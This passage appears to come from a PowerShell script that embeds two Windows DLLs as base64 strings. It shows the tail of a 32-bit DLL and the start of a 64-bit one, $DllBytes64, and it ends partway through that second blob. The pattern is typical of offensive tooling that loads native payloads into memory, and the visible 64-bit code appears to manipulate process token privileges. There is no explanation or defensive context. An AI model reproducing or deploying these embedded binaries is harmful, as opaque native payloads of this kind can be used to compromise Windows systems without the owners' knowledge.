Qcm9jQWRkcmVzcwAAzwJIZWFwRnJlZQAAGQFFeGl0UHJvY2VzcwBvBFNldEhhbmRsZUNvdW50AABkAkdldFN0ZEhhbmRsZQAA4wJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50APMBR2V0RmlsZVR5cGUAYwJHZXRTdGFydHVwSW5mb1cA0QBEZWxldGVDcml0aWNhbFNlY3Rpb24AEwJHZXRNb2R1bGVGaWxlTmFtZUEAAGEBRnJlZUVudmlyb25tZW50U3RyaW5nc1cAEQVXaWRlQ2hhclRvTXVsdGlCeXRlANoBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAzQJIZWFwQ3JlYXRlAADOAkhlYXBEZXN0cm95AKcDUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAkwJHZXRUaWNrQ291bnQAAMEBR2V0Q3VycmVudFByb2Nlc3NJZAB5AkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAMsCSGVhcEFsbG9jALEDUmFpc2VFeGNlcHRpb24AADkDTGVhdmVDcml0aWNhbFNlY3Rpb24AAO4ARW50ZXJDcml0aWNhbFNlY3Rpb24AAHIBR2V0Q1BJbmZvAGgBR2V0QUNQAAA3AkdldE9FTUNQAAAKA0lzVmFsaWRDb2RlUGFnZQDSAkhlYXBSZUFsbG9jAD8DTG9hZExpYnJhcnlXAAAlBVdyaXRlRmlsZQAUAkdldE1vZHVsZUZpbGVOYW1lVwAAGARSdGxVbndpbmQA1AJIZWFwU2l6ZQAALQNMQ01hcFN0cmluZ1cAAGcDTXVsdGlCeXRlVG9XaWRlQ2hhcgBpAkdldFN0cmluZ1R5cGVXAAAEA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\"\n    $DllBytes64 = \"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